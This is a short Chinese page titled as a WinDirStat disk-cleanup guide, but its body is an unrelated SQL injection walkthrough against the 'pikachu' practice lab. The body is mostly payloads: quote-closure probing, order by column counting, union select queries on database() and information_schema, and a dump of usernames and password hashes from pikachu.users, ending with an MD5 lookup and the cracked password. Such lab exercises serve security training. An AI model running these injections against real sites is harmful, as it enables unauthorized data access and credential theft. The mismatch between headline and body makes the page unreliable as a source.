如何快速清理Windows磁盘空间:WinDirStat完整使用指南
2026/4/24 15:09:08
1.通过字符型注入上面的数字型注入可以得到几个账户名,这里我们选择3号账户名:kobe
2.返回字符型注入界面,输入kobe这个账户名
1.在账户名的后面输入一个反斜杠,通过查看报错来验证闭合方式
kobe\2.主要看这个内容
可以判断出闭合符合是单引号‘
(1)试试是不是3位
kobe'order by 3#报错了,说明不是3位
(2)试试是不是2位
kobe'order by 2 #数据正常输出,代表就是2位
kobe'union select 1,2#kobe'union select 1,database()#得到数据库名“pikachu”
kobe'union select 1,table_name from information_schema.tables where table_schema='pikachu'#kobe'union select 1,column_name from information_schema.columns where table_schema='pikachu' and table_name='users'#kobe'union select username,password from pikachu.users#MD5的解码网站是https://www.cmd5.com/
得到明文密码:123456